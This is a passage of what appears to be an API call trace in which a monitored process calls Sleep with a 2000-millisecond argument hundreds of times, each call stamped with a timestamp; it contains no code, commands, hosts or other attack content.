Sleep (dwMilliseconds=0x7d0) [0123.838] Sleep (dwMilliseconds=0x7d0) [0123.854] Sleep (dwMilliseconds=0x7d0) [0123.871] Sleep (dwMilliseconds=0x7d0) [0123.886] Sleep (dwMilliseconds=0x7d0) [0123.902] Sleep (dwMilliseconds=0x7d0) [0123.916] Sleep (dwMilliseconds=0x7d0) [0123.930] Sleep (dwMilliseconds=0x7d0) [0123.949] Sleep (dwMilliseconds=0x7d0) [0123.963] Sleep (dwMilliseconds=0x7d0) [0123.978] Sleep (dwMilliseconds=0x7d0) [0123.994] Sleep (dwMilliseconds=0x7d0) [0124.009] Sleep (dwMilliseconds=0x7d0) [0124.025] Sleep (dwMilliseconds=0x7d0) [0124.041] Sleep (dwMilliseconds=0x7d0) [0124.058] Sleep (dwMilliseconds=0x7d0) [0124.073] Sleep (dwMilliseconds=0x7d0) [0124.089] Sleep (dwMilliseconds=0x7d0) [0124.104] Sleep (dwMilliseconds=0x7d0) [0124.119] Sleep (dwMilliseconds=0x7d0) [0124.133] Sleep (dwMilliseconds=0x7d0) [0124.150] Sleep (dwMilliseconds=0x7d0) [0124.166] Sleep (dwMilliseconds=0x7d0) [0124.190] Sleep (dwMilliseconds=0x7d0) [0124.197] Sleep (dwMilliseconds=0x7d0) [0124.216] Sleep (dwMilliseconds=0x7d0) [0124.231] Sleep (dwMilliseconds=0x7d0) [0124.243] Sleep (dwMilliseconds=0x7d0) [0124.259] Sleep (dwMilliseconds=0x7d0) [0124.275] Sleep (dwMilliseconds=0x7d0) [0124.291] Sleep (dwMilliseconds=0x7d0) [0124.306] Sleep (dwMilliseconds=0x7d0) [0124.330] Sleep (dwMilliseconds=0x7d0) [0124.338] Sleep (dwMilliseconds=0x7d0) [0124.356] Sleep (dwMilliseconds=0x7d0) [0124.368] Sleep (dwMilliseconds=0x7d0) [0124.385] Sleep (dwMilliseconds=0x7d0) [0124.402] Sleep (dwMilliseconds=0x7d0) [0124.418] Sleep (dwMilliseconds=0x7d0) [0124.430] Sleep (dwMilliseconds=0x7d0) [0124.446] Sleep (dwMilliseconds=0x7d0) [0124.464] Sleep (dwMilliseconds=0x7d0) [0124.477] Sleep (dwMilliseconds=0x7d0) [0124.493] Sleep (dwMilliseconds=0x7d0) [0124.509] Sleep (dwMilliseconds=0x7d0) [0124.524] Sleep (dwMilliseconds=0x7d0) [0124.539] Sleep (dwMilliseconds=0x7d0) [0124.556] Sleep (dwMilliseconds=0x7d0) [0124.571] Sleep (dwMilliseconds=0x7d0) [0124.587] Sleep (dwMilliseconds=0x7d0) [0124.602] Sleep (dwMilliseconds=0x7d0) [0124.619] Sleep (dwMilliseconds=0x7d0) [0124.633] Sleep (dwMilliseconds=0x7d0) [0124.650] Sleep (dwMilliseconds=0x7d0) [0124.664] Sleep (dwMilliseconds=0x7d0) [0124.681] Sleep (dwMilliseconds=0x7d0) [0124.700] Sleep (dwMilliseconds=0x7d0) [0124.712] Sleep (dwMilliseconds=0x7d0) [0124.728] Sleep (dwMilliseconds=0x7d0) [0124.743] Sleep (dwMilliseconds=0x7d0) [0124.793] Sleep (dwMilliseconds=0x7d0) [0124.806] Sleep (dwMilliseconds=0x7d0) [0124.820] Sleep (dwMilliseconds=0x7d0) [0124.839] Sleep (dwMilliseconds=0x7d0) [0124.852] Sleep (dwMilliseconds=0x7d0) [0124.909] Sleep (dwMilliseconds=0x7d0) [0124.924] Sleep (dwMilliseconds=0x7d0) [0124.979] Sleep (dwMilliseconds=0x7d0) [0125.058] Sleep (dwMilliseconds=0x7d0) [0125.103] Sleep (dwMilliseconds=0x7d0) [0125.150] Sleep (dwMilliseconds=0x7d0) [0125.165] Sleep (dwMilliseconds=0x7d0) [0125.179] Sleep (dwMilliseconds=0x7d0) [0125.194] Sleep (dwMilliseconds=0x7d0) [0125.217] Sleep (dwMilliseconds=0x7d0) [0125.226] Sleep (dwMilliseconds=0x7d0) [0125.243] Sleep (dwMilliseconds=0x7d0) [0125.258] Sleep (dwMilliseconds=0x7d0) [0125.274] Sleep (dwMilliseconds=0x7d0) [0125.291] Sleep (dwMilliseconds=0x7d0) [0125.304] Sleep (dwMilliseconds=0x7d0) [0125.319] Sleep (dwMilliseconds=0x7d0) [0125.354] Sleep (dwMilliseconds=0x7d0) [0125.372] Sleep (dwMilliseconds=0x7d0) [0125.382] Sleep (dwMilliseconds=0x7d0) [0125.397] Sleep (dwMilliseconds=0x7d0) [0125.413] Sleep (dwMilliseconds=0x7d0) [0125.432] Sleep (dwMilliseconds=0x7d0) [0125.444] Sleep (dwMilliseconds=0x7d0) [0125.461] Sleep (dwMilliseconds=0x7d0) [0125.475] Sleep (dwMilliseconds=0x7d0) [0125.491] Sleep (dwMilliseconds=0x7d0) [0125.509] Sleep (dwMilliseconds=0x7d0) [0125.521] Sleep (dwMilliseconds=0x7d0) [0125.540] Sleep (dwMilliseconds=0x7d0) [0125.563] Sleep (dwMilliseconds=0x7d0) [0125.585] Sleep (dwMilliseconds=0x7d0) [0125.608] Sleep (dwMilliseconds=0x7d0) [0125.616] Sleep (dwMilliseconds=0x7d0) [0125.631] Sleep (dwMilliseconds=0x7d0) [0125.647] Sleep (dwMilliseconds=0x7d0) [0125.663] Sleep (dwMilliseconds=0x7d0) [0125.678] Sleep (dwMilliseconds=0x7d0) [0125.695] Sleep (dwMilliseconds=0x7d0) [0125.719] Sleep (dwMilliseconds=0x7d0) [0125.724] Sleep (dwMilliseconds=0x7d0) [0125.740] Sleep (dwMilliseconds=0x7d0) [0125.788] Sleep (dwMilliseconds=0x7d0) [0125.803] Sleep (dwMilliseconds=0x7d0) [0125.818] Sleep (dwMilliseconds=0x7d0) [0125.837] Sleep (dwMilliseconds=0x7d0) [0125.850] Sleep (dwMilliseconds=0x7d0) [0125.888] Sleep (dwMilliseconds=0x7d0) [0125.896] Sleep (dwMilliseconds=0x7d0) [0125.912] Sleep (dwMilliseconds=0x7d0) [0125.929] Sleep (dwMilliseconds=0x7d0) [0125.943] Sleep (dwMilliseconds=0x7d0) [0125.962] Sleep (dwMilliseconds=0x7d0) [0125.975] Sleep (dwMilliseconds=0x7d0) [0125.993] Sleep (dwMilliseconds=0x7d0) [0126.006] Sleep (dwMilliseconds=0x7d0) [0126.022] Sleep (dwMilliseconds=0x7d0) [0126.274] Sleep (dwMilliseconds=0x7d0) [0126.286] Sleep (dwMilliseconds=0x7d0) [0126.306] Sleep (dwMilliseconds=0x7d0) [0126.320] Sleep (dwMilliseconds=0x7d0) [0126.333] Sleep (dwMilliseconds=0x7d0) [0126.351] Sleep (dwMilliseconds=0x7d0) [0126.364] Sleep (dwMilliseconds=0x7d0) [0126.381] Sleep (dwMilliseconds=0x7d0) [0126.395] Sleep (dwMilliseconds=0x7d0) [0126.411] Sleep (dwMilliseconds=0x7d0) [0126.429] Sleep (dwMilliseconds=0x7d0) [0126.455] Sleep (dwMilliseconds=0x7d0) [0126.474] Sleep (dwMilliseconds=0x7d0) [0126.492] Sleep (dwMilliseconds=0x7d0) [0126.505] Sleep (dwMilliseconds=0x7d0) [0126.522] Sleep (dwMilliseconds=0x7d0) [0126.540] Sleep (dwMilliseconds=0x7d0) [0126.552] Sleep (dwMilliseconds=0x7d0) [0126.569] Sleep (dwMilliseconds=0x7d0) [0126.586] Sleep (dwMilliseconds=0x7d0) [0126.598] Sleep (dwMilliseconds=0x7d0) [0126.614] Sleep (dwMilliseconds=0x7d0) [0126.630] Sleep (dwMilliseconds=0x7d0) [0126.645] Sleep (dwMilliseconds=0x7d0) [0126.661] Sleep (dwMilliseconds=0x7d0) [0126.676] Sleep (dwMilliseconds=0x7d0) [0126.692] Sleep (dwMilliseconds=0x7d0) [0126.707] Sleep (dwMilliseconds=0x7d0) [0126.728] Sleep (dwMilliseconds=0x7d0) [0126.741] Sleep (dwMilliseconds=0x7d0) [0126.754] Sleep (dwMilliseconds=0x7d0) [0126.772] Sleep (dwMilliseconds=0x7d0) [0126.787] Sleep (dwMilliseconds=0x7d0) [0126.801] Sleep (dwMilliseconds=0x7d0) [0126.817] Sleep (dwMilliseconds=0x7d0) [0126.832] Sleep (dwMilliseconds=0x7d0) [0126.848] Sleep (dwMilliseconds=0x7d0) [0126.864] Sleep (dwMilliseconds=0x7d0) [0126.880] Sleep (dwMilliseconds=0x7d0) [0126.911] Sleep (dwMilliseconds=0x7d0) [0126.927] Sleep (dwMilliseconds=0x7d0) [0126.942] Sleep (dwMilliseconds=0x7d0) [0126.958] Sleep (dwMilliseconds=0x7d0) [0126.972] Sleep (dwMilliseconds=0x7d0) [0126.989] Sleep (dwMilliseconds=0x7d0) [0127.003] Sleep (dwMilliseconds=0x7d0) [0127.020] Sleep (dwMilliseconds=0x7d0) [0127.035] Sleep (dwMilliseconds=0x7d0) [0127.051] Sleep (dwMilliseconds=0x7d0) [0127.068] Sleep (dwMilliseconds=0x7d0) [0127.085] Sleep (dwMilliseconds=0x7d0) [0127.098] Sleep (dwMilliseconds=0x7d0) [0127.129] Sleep (dwMilliseconds=0x7d0) [0127.155] Sleep (dwMilliseconds=0x7d0) [0127.159] Sleep (dwMilliseconds=0x7d0) [0127.178] Sleep (dwMilliseconds=0x7d0) [0127.192] Sleep (dwMilliseconds=0x7d0) [0127.206] Sleep (dwMilliseconds=0x7d0) [0127.223] Sleep (dwMilliseconds=0x7d0) [0127.249] Sleep (dwMilliseconds=0x7d0) [0127.252] Sleep (dwMilliseconds=0x7d0) [0127.269] Sleep (dwMilliseconds=0x7d0) [0127.285] Sleep (dwMilliseconds=0x7d0) [0127.302] Sleep (dwMilliseconds=0x7d0) [0127.316] Sleep (dwMilliseconds=0x7d0) [0127.333] Sleep (dwMilliseconds=0x7d0) [0127.348] Sleep (dwMilliseconds=0x7d0) [0127.364] Sleep (dwMilliseconds=0x7d0) [0127.378] Sleep (dwMilliseconds=0x7d0) [0127.394] Sleep (dwMilliseconds=0x7d0) [0127.410] Sleep (dwMilliseconds=0x7d0) [0127.425] Sleep (dwMilliseconds=0x7d0) [0127.442] Sleep (dwMilliseconds=0x7d0) [0127.456] Sleep (dwMilliseconds=0x7d0) [0127.472] Sleep (dwMilliseconds=0x7d0) [0127.522] Sleep (dwMilliseconds=0x7d0) [0127.566] Sleep (dwMilliseconds=0x7d0) [0127.581] Sleep (dwMilliseconds=0x7d0) [0127.597] Sleep (dwMilliseconds=0x7d0) [0127.615] Sleep (dwMilliseconds=0x7d0) [0127.632] Sleep (dwMilliseconds=0x7d0) [0127.644] Sleep (dwMilliseconds=0x7d0) [0127.659] Sleep (dwMilliseconds=0x7d0) [0127.675] Sleep (dwMilliseconds=0x7d0) [0127.704] Sleep (dwMilliseconds=0x7d0) [0127.722] Sleep (dwMilliseconds=0x7d0) [0127.743] Sleep (dwMilliseconds=0x7d0) [0127.752] Sleep (dwMilliseconds=0x7d0) [0127.768] Sleep (dwMilliseconds=0x7d0) [0127.784] Sleep (dwMilliseconds=0x7d0) [0127.799] Sleep (dwMilliseconds=0x7d0) [0127.815] Sleep (dwMilliseconds=0x7d0) [0127.831] Sleep (dwMilliseconds=0x7d0) [0127.848] Sleep (dwMilliseconds=0x7d0) [0127.862] Sleep (dwMilliseconds=0x7d0) [0127.878] Sleep (dwMilliseconds=0x7d0) [0127.893] Sleep (dwMilliseconds=0x7d0) [0127.926] Sleep (dwMilliseconds=0x7d0) [0127.940] Sleep (dwMilliseconds=0x7d0) [0127.957] Sleep (dwMilliseconds=0x7d0) [0127.972] Sleep (dwMilliseconds=0x7d0) [0127.987] Sleep (dwMilliseconds=0x7d0) [0128.004] Sleep (dwMilliseconds=0x7d0) [0128.018] Sleep (dwMilliseconds=0x7d0) [0128.039] Sleep (dwMilliseconds=0x7d0) [0128.049] Sleep (dwMilliseconds=0x7d0) [0128.067] Sleep (dwMilliseconds=0x7d0) [0128.080] Sleep (dwMilliseconds=0x7d0) [0128.096] Sleep (dwMilliseconds=0x7d0) [0128.115] Sleep (dwMilliseconds=0x7d0) [0128.128] Sleep (dwMilliseconds=0x7d0) [0128.143] Sleep (dwMilliseconds=0x7d0) [0128.159] Sleep (dwMilliseconds=0x7d0) [0128.176] Sleep (dwMilliseconds=0x7d0) [0128.190] Sleep (dwMilliseconds=0x7d0) [0128.207] Sleep (dwMilliseconds=0x7d0) [0128.220] Sleep (dwMilliseconds=0x7d0) [0128.236] Sleep (dwMilliseconds=0x7d0) [0128.251] Sleep (dwMilliseconds=0x7d0) [0128.268] Sleep (dwMilliseconds=0x7d0) [0128.283] Sleep (dwMilliseconds=0x7d0) [0128.300] Sleep (dwMilliseconds=0x7d0) [0128.314] Sleep (dwMilliseconds=0x7d0) [0128.333] Sleep (dwMilliseconds=0x7d0) [0128.345] Sleep (dwMilliseconds=0x7d0) [0128.361] Sleep (dwMilliseconds=0x7d0) [0128.377] Sleep (dwMilliseconds=0x7d0) [0128.394] Sleep (dwMilliseconds=0x7d0) [0128.410] Sleep (dwMilliseconds=0x7d0) [0128.424] Sleep (dwMilliseconds=0x7d0) [0128.442] Sleep (dwMilliseconds=0x7d0) [0128.454] Sleep (dwMilliseconds=0x7d0) [0128.470] Sleep (dwMilliseconds=0x7d0) [0128.487] Sleep (dwMilliseconds=0x7d0) [0128.502] Sleep (dwMilliseconds=0x7d0) [0128.517] Sleep (dwMilliseconds=0x7d0) [0128.532] Sleep (dwMilliseconds=0x7d0) [0128.547] Sleep (dwMilliseconds=0x7d0) [0128.569] Sleep (dwMilliseconds=0x7d0) [0128.583] Sleep (dwMilliseconds=0x7d0) [0128.594] Sleep (dwMilliseconds=0x7d0) [0128.618] Sleep (dwMilliseconds=0x7d0) [0128.627] Sleep (dwMilliseconds=0x7d0) [0128.642] Sleep (dwMilliseconds=0x7d0) [0128.664] Sleep (dwMilliseconds=0x7d0) [0128.673] Sleep (dwMilliseconds=0x7d0) [0128.689] Sleep (dwMilliseconds=0x7d0) [0128.704] Sleep (dwMilliseconds=0x7d0) [0128.722] Sleep (dwMilliseconds=0x7d0) [0128.756] Sleep (dwMilliseconds=0x7d0) [0128.766] Sleep (dwMilliseconds=0x7d0) [0128.782] Sleep (dwMilliseconds=0x7d0) [0128.798] Sleep (dwMilliseconds=0x7d0) [0128.840] Sleep (dwMilliseconds=0x7d0) [0128.844] Sleep (dwMilliseconds=0x7d0) [0128.860] Sleep (dwMilliseconds=0x7d0) [0128.877] Sleep (dwMilliseconds=0x7d0) [0128.892] Sleep (dwMilliseconds=0x7d0) [0128.907] Sleep (dwMilliseconds=0x7d0) [0128.950] Sleep (dwMilliseconds=0x7d0) [0128.969] Sleep (dwMilliseconds=0x7d0) [0128.985] Sleep (dwMilliseconds=0x7d0) [0129.002] Sleep (dwMilliseconds=0x7d0) [0129.017] Sleep (dwMilliseconds=0x7d0) [0129.034] Sleep (dwMilliseconds=0x7d0) [0129.048] Sleep (dwMilliseconds=0x7d0) [0129.063] Sleep (dwMilliseconds=0x7d0) [0129.081] Sleep (dwMilliseconds=0x7d0) [0129.095] Sleep (dwMilliseconds=0x7d0) [0129.113] Sleep (dwMilliseconds=0x7d0) [0129.126] Sleep (dwMilliseconds=0x7d0) [0129.142] Sleep (dwMilliseconds=0x7d0) [0129.160] Sleep (dwMilliseconds=0x7d0) [0129.173] Sleep (dwMilliseconds=0x7d0) [0129.187] Sleep (dwMilliseconds=0x7d0) [0129.206] Sleep (dwMilliseconds=0x7d0) [0129.219] Sleep (dwMilliseconds=0x7d0) [0129.235] Sleep (dwMilliseconds=0x7d0) [0129.264] Sleep (dwMilliseconds=0x7d0) [0129.282] Sleep (dwMilliseconds=0x7d0) [0129.299] Sleep (dwMilliseconds=0x7d0) [0129.313] Sleep (dwMilliseconds=0x7d0) [0129.328] Sleep (dwMilliseconds=0x7d0) [0129.344] Sleep (dwMilliseconds=0x7d0) [0129.360] Sleep (dwMilliseconds=0x7d0) [0129.375] Sleep (dwMilliseconds=0x7d0) [0129.390] Sleep (dwMilliseconds=0x7d0) [0129.407] Sleep (dwMilliseconds=0x7d0) [0129.421] Sleep (dwMilliseconds=0x7d0) [0129.438] Sleep (dwMilliseconds=0x7d0) [0129.454] Sleep (dwMilliseconds=0x7d0) [0129.469] Sleep (dwMilliseconds=0x7d0) [0129.486] Sleep (dwMilliseconds=0x7d0) [0129.501] Sleep (dwMilliseconds=0x7d0) [0129.516] Sleep (dwMilliseconds=0x7d0) [0129.532] Sleep (dwMilliseconds=0x7d0) [0129.547] Sleep (dwMilliseconds=0x7d0) [0129.564] Sleep (dwMilliseconds=0x7d0) [0129.578] Sleep (dwMilliseconds=0x7d0) [0129.593] Sleep (dwMilliseconds=0x7d0) [0129.611] Sleep (dwMilliseconds=0x7d0) [0129.626] Sleep (dwMilliseconds=0x7d0) [0129.640] Sleep (dwMilliseconds=0x7d0) [0129.658] Sleep (dwMilliseconds=0x7d0) [0129.672] Sleep (dwMilliseconds=0x7d0) [0129.688] Sleep (dwMilliseconds=0x7d0) [0129.703] Sleep (dwMilliseconds=0x7d0) [0129.720] Sleep (dwMilliseconds=0x7d0) [0129.740] Sleep (dwMilliseconds=0x7d0) [0129.750] Sleep (dwMilliseconds=0x7d0) [0129.766] Sleep (dwMilliseconds=0x7d0) [0129.782] Sleep (dwMilliseconds=0x7d0) [0129.797] Sleep (dwMilliseconds=0x7d0) [0129.811] Sleep (dwMilliseconds=0x7d0) [0129.831] Sleep (dwMilliseconds=0x7d0) [0129.848] Sleep (dwMilliseconds=0x7d0) [0129.858] Sleep (dwMilliseconds=0x7d0) [0129.875] Sleep (dwMilliseconds=0x7d0) [0129.894] Sleep (dwMilliseconds=0x7d0) [0129.906] Sleep (dwMilliseconds=0x7d0) [0129.941] Sleep (dwMilliseconds=0x7d0) [0129.952] Sleep (dwMilliseconds=0x7d0) [0129.968] Sleep (dwMilliseconds=0x7d0) [0129.983] Sleep (dwMilliseconds=0x7d0) [0130.000] Sleep (dwMilliseconds=0x7d0) [0130.015] Sleep (dwMilliseconds=0x7d0) [0130.030] Sleep (dwMilliseconds=0x7d0) [0130.046] Sleep (dwMilliseconds=0x7d0) [0130.064] Sleep (dwMilliseconds=0x7d0) [0130.076] Sleep (dwMilliseconds=0x7d0) [0130.093] Sleep (dwMilliseconds=0x7d0) [0130.112] Sleep (dwMilliseconds=0x7d0) [0130.125] Sleep (dwMilliseconds=0x7d0) [0130.143] Sleep (dwMilliseconds=0x7d0) [0130.155] Sleep (dwMilliseconds=0x7d0) [0130.171] Sleep (dwMilliseconds=0x7d0) [0130.186] Sleep (dwMilliseconds=0x7d0) [0130.202] Sleep (dwMilliseconds=0x7d0) [0130.218] Sleep (dwMilliseconds=0x7d0) [0130.233] Sleep (dwMilliseconds=0x7d0) [0130.249] Sleep (dwMilliseconds=0x7d0) [0130.265] Sleep (dwMilliseconds=0x7d0) [0130.280] Sleep (dwMilliseconds=0x7d0) [0130.295] Sleep (dwMilliseconds=0x7d0) [0130.311] Sleep (dwMilliseconds=0x7d0) [0130.328] Sleep (dwMilliseconds=0x7d0) [0130.342] Sleep (dwMilliseconds=0x7d0) [0130.358] Sleep (dwMilliseconds=0x7d0) [0130.373] Sleep (dwMilliseconds=0x7d0) [0130.389] Sleep (dwMilliseconds=0x7d0) [0130.404] Sleep (dwMilliseconds=0x7d0) [0130.420] Sleep (dwMilliseconds=0x7d0) [0130.437] Sleep (dwMilliseconds=0x7d0) [0130.453] Sleep (dwMilliseconds=0x7d0) [0130.467] Sleep (dwMilliseconds=0x7d0) [0130.484] Sleep (dwMilliseconds=0x7d0) [0130.497] Sleep (dwMilliseconds=0x7d0) [0130.514] Sleep (dwMilliseconds=0x7d0) [0130.535] Sleep (dwMilliseconds=0x7d0) [0130.546] Sleep (dwMilliseconds=0x7d0) [0130.561] Sleep (dwMilliseconds=0x7d0) [0130.576] Sleep (dwMilliseconds=0x7d0) [0130.592] Sleep (dwMilliseconds=0x7d0) [0130.610] Sleep (dwMilliseconds=0x7d0) [0130.625] Sleep (dwMilliseconds=0x7d0) [0130.640] Sleep (dwMilliseconds=0x7d0) [0130.655] Sleep (dwMilliseconds=0x7d0) [0130.672] Sleep (dwMilliseconds=0x7d0) [0130.686] Sleep (dwMilliseconds=0x7d0) [0130.702] Sleep (dwMilliseconds=0x7d0) [0130.718] Sleep (dwMilliseconds=0x7d0) [0130.733] Sleep (dwMilliseconds=0x7d0) [0130.751] Sleep (dwMilliseconds=0x7d0) [0130.767] Sleep (dwMilliseconds=0x7d0) [0130.779] Sleep (dwMilliseconds=0x7d0) [0130.795] Sleep (dwMilliseconds=0x7d0) [0130.811] Sleep (dwMilliseconds=0x7d0) [0130.826] Sleep (dwMilliseconds=0x7d0) [0130.841] Sleep (dwMilliseconds=0x7d0) [0130.857] Sleep (dwMilliseconds=0x7d0) [0130.873] Sleep (dwMilliseconds=0x7d0) [0130.890] Sleep (dwMilliseconds=0x7d0) [0130.904] Sleep (dwMilliseconds=0x7d0) [0130.938] Sleep (dwMilliseconds=0x7d0) [0130.951] Sleep (dwMilliseconds=0x7d0) [0130.970] Sleep (dwMilliseconds=0x7d0) [0130.982] Sleep (dwMilliseconds=0x7d0) [0130.998] Sleep (dwMilliseconds=0x7d0) [0131.013] Sleep (dwMilliseconds=0x7d0) [0131.029] Sleep (dwMilliseconds=0x7d0) [0131.046] Sleep (dwMilliseconds=0x7d0) [0131.062] Sleep (dwMilliseconds=0x7d0) [0131.076] Sleep (dwMilliseconds=0x7d0) [0131.091] Sleep (dwMilliseconds=0x7d0) [0131.108] Sleep (dwMilliseconds=0x7d0) [0131.124] Sleep (dwMilliseconds=0x7d0) [0131.139] Sleep (dwMilliseconds=0x7d0) [0131.154] Sleep (dwMilliseconds=0x7d0) [0131.179] Sleep (dwMilliseconds=0x7d0) [0131.194] Sleep (dwMilliseconds=0x7d0) [0131.201] Sleep (dwMilliseconds=0x7d0) [0131.216] Sleep (dwMilliseconds=0x7d0) [0131.232] Sleep (dwMilliseconds=0x7d0) [0131.396] Sleep (dwMilliseconds=0x7d0) [0131.409] Sleep (dwMilliseconds=0x7d0) [0131.426] Sleep (dwMilliseconds=0x7d0) [0131.446] Sleep (dwMilliseconds=0x7d0) [0131.466] Sleep (dwMilliseconds=0x7d0) [0131.483] Sleep (dwMilliseconds=0x7d0) [0131.497] Sleep (dwMilliseconds=0x7d0) [0131.516] Sleep (dwMilliseconds=0x7d0) [0131.531] Sleep (dwMilliseconds=0x7d0) [0131.555] Sleep (dwMilliseconds=0x7d0) [0131.581] Sleep (dwMilliseconds=0x7d0) [0131.587] Sleep (dwMilliseconds=0x7d0) [0131.602] Sleep (dwMilliseconds=0x7d0) [0131.618] Sleep (dwMilliseconds=0x7d0) [0131.640] Sleep (dwMilliseconds=0x7d0) [0131.649] Sleep (dwMilliseconds=0x7d0) [0131.685] Sleep (dwMilliseconds=0x7d0) [0131.703] Sleep (dwMilliseconds=0x7d0) [0131.711] Sleep (dwMilliseconds=0x7d0) [0131.730] Sleep (dwMilliseconds=0x7d0) [0131.743] Sleep (dwMilliseconds=0x7d0) [0131.758] Sleep (dwMilliseconds=0x7d0) [0131.779] Sleep (dwMilliseconds=0x7d0) [0131.801] Sleep (dwMilliseconds=0x7d0) [0131.820] Sleep (dwMilliseconds=0x7d0) [0131.836] Sleep (dwMilliseconds=0x7d0) [0131.853] Sleep (dwMilliseconds=0x7d0) [0131.867] Sleep (dwMilliseconds=0x7d0) [0131.883] Sleep (dwMilliseconds=0x7d0) [0131.898] Sleep (dwMilliseconds=0x7d0) [0131.914] Sleep (dwMilliseconds=0x7d0) [0131.933] Sleep (dwMilliseconds=0x7d0) [0131.945] Sleep (dwMilliseconds=0x7d0) [0131.998] Sleep (dwMilliseconds=0x7d0) [0132.008] Sleep (dwMilliseconds=0x7d0) [0132.024] Sleep (dwMilliseconds=0x7d0) [0132.039] Sleep (dwMilliseconds=0x7d0) [0132.054] Sleep (dwMilliseconds=0x7d0) [0132.073] Sleep (dwMilliseconds=0x7d0) [0132.092] Sleep (dwMilliseconds=0x7d0) [0132.102] Sleep (dwMilliseconds=0x7d0) [0132.122] Sleep (dwMilliseconds=0x7d0) [0132.137] Sleep (dwMilliseconds=0x7d0) [0132.148] Sleep (dwMilliseconds=0x7d0) [0132.167] Sleep (dwMilliseconds=0x7d0) [0132.182] Sleep (dwMilliseconds=0x7d0) [0132.203] Sleep (dwMilliseconds=0x7d0) [0132.216] Sleep (dwMilliseconds=0x7d0) [0132.230] Sleep (dwMilliseconds=0x7d0) [0132.247] Sleep (dwMilliseconds=0x7d0) [0132.305] Sleep (dwMilliseconds=0x7d0) [0132.324] Sleep (dwMilliseconds=0x7d0) [0132.337] Sleep (dwMilliseconds=0x7d0) [0132.351] Sleep (dwMilliseconds=0x7d0) [0132.367] Sleep (dwMilliseconds=0x7d0) [0132.382] Sleep (dwMilliseconds=0x7d0) [0132.399] Sleep (dwMilliseconds=0x7d0) [0132.414] Sleep (dwMilliseconds=0x7d0) [0132.430] Sleep (dwMilliseconds=0x7d0) [0132.444] Sleep (dwMilliseconds=0x7d0) [0132.460] Sleep (dwMilliseconds=0x7d0) [0132.477] Sleep (dwMilliseconds=0x7d0) [0132.491] Sleep (dwMilliseconds=0x7d0) [0132.507] Sleep (dwMilliseconds=0x7d0) [0132.529] Sleep (dwMilliseconds=0x7d0) [0132.545] Sleep (dwMilliseconds=0x7d0) [0132.554] Sleep (dwMilliseconds=0x7d0) [0132.569] Sleep (dwMilliseconds=0x7d0) [0132.585] Sleep (dwMilliseconds=0x7d0) [0132.607] Sleep (dwMilliseconds=0x7d0) [0132.623] Sleep (dwMilliseconds=0x7d0) [0132.632] Sleep (dwMilliseconds=0x7d0) [0132.647] Sleep (dwMilliseconds=0x7d0) [0132.663] Sleep (dwMilliseconds=0x7d0) [0132.678] Sleep (dwMilliseconds=0x7d0) [0132.694] Sleep (dwMilliseconds=0x7d0) [0132.713] Sleep (dwMilliseconds=0x7d0) [0132.727] Sleep (dwMilliseconds=0x7d0) [0132.773] Sleep (dwMilliseconds=0x7d0) [0132.813] Sleep (dwMilliseconds=0x7d0) [0132.819] Sleep (dwMilliseconds=0x7d0) [0132.835] Sleep (dwMilliseconds=0x7d0) [0132.850] Sleep (dwMilliseconds=0x7d0) [0132.865] Sleep (dwMilliseconds=0x7d0) [0132.881] Sleep (dwMilliseconds=0x7d0) [0132.897] Sleep (dwMilliseconds=0x7d0) [0132.912] Sleep (dwMilliseconds=0x7d0) [0132.929] Sleep (dwMilliseconds=0x7d0) [0132.963] Sleep (dwMilliseconds=0x7d0) [0132.976] Sleep (dwMilliseconds=0x7d0) [0133.010] Sleep (dwMilliseconds=0x7d0) [0133.022] Sleep (dwMilliseconds=0x7d0) [0133.038] Sleep (dwMilliseconds=0x7d0) [0133.053] Sleep (dwMilliseconds=0x7d0) [0133.068] Sleep (dwMilliseconds=0x7d0) [0133.084] Sleep (dwMilliseconds=0x7d0) [0133.100] Sleep (dwMilliseconds=0x7d0) [0133.115] Sleep (dwMilliseconds=0x7d0) [0133.131] Sleep (dwMilliseconds=0x7d0) [0133.147] Sleep (dwMilliseconds=0x7d0) [0133.162] Sleep (dwMilliseconds=0x7d0) [0133.178] Sleep (dwMilliseconds=0x7d0) [0133.193] Sleep (dwMilliseconds=0x7d0) [0133.209] Sleep (dwMilliseconds=0x7d0) [0133.224] Sleep (dwMilliseconds=0x7d0) [0133.240] Sleep (dwMilliseconds=0x7d0) [0133.256] Sleep (dwMilliseconds=0x7d0) [0133.273] Sleep (dwMilliseconds=0x7d0) [0133.287] Sleep (dwMilliseconds=0x7d0) [0133.302] Sleep (dwMilliseconds=0x7d0) [0133.318] Sleep (dwMilliseconds=0x7d0) [0133.333] Sleep (dwMilliseconds=0x7d0) [0133.349] Sleep (dwMilliseconds=0x7d0) [0133.366] Sleep (dwMilliseconds=0x7d0) [0133.380] Sleep (dwMilliseconds=0x7d0) [0133.396] Sleep (dwMilliseconds=0x7d0) [0133.412] Sleep (dwMilliseconds=0x7d0) [0133.427] Sleep (dwMilliseconds=0x7d0) [0133.443] Sleep (dwMilliseconds=0x7d0) [0133.458] Sleep (dwMilliseconds=0x7d0) [0133.475] Sleep (dwMilliseconds=0x7d0) [0133.489] Sleep (dwMilliseconds=0x7d0) [0133.512] Sleep (dwMilliseconds=0x7d0) [0133.521] Sleep (dwMilliseconds=0x7d0) [0133.536] Sleep (dwMilliseconds=0x7d0) [0133.552] Sleep (dwMilliseconds=0x7d0) [0133.567] Sleep (dwMilliseconds=0x7d0) [0133.584] Sleep (dwMilliseconds=0x7d0) [0133.599] Sleep (dwMilliseconds=0x7d0) [0133.614] Sleep (dwMilliseconds=0x7d0) [0133.630] Sleep (dwMilliseconds=0x7d0) [0133.646] Sleep (dwMilliseconds=0x7d0) [0133.661] Sleep (dwMilliseconds=0x7d0) [0133.678] Sleep (dwMilliseconds=0x7d0) [0133.692] Sleep (dwMilliseconds=0x7d0) [0133.708] Sleep (dwMilliseconds=0x7d0) [0133.724] Sleep (dwMilliseconds=0x7d0) [0133.739] Sleep (dwMilliseconds=0x7d0) [0133.759] Sleep (dwMilliseconds=0x7d0) [0133.770] Sleep (dwMilliseconds=0x7d0) [0133.893] Sleep (dwMilliseconds=0x7d0) [0133.905] Sleep (dwMilliseconds=0x7d0) [0133.914] Sleep (dwMilliseconds=0x7d0) [0133.930] Sleep (dwMilliseconds=0x7d0) [0133.946] Sleep (dwMilliseconds=0x7d0) [0133.961] Sleep (dwMilliseconds=0x7d0) [0133.977] Sleep (dwMilliseconds=0x7d0) [0133.994] Sleep (dwMilliseconds=0x7d0) [0134.009] Sleep (dwMilliseconds=0x7d0) [0134.024] Sleep (dwMilliseconds=0x7d0) [0134.040] Sleep (dwMilliseconds=0x7d0) [0134.055] Sleep (dwMilliseconds=0x7d0) 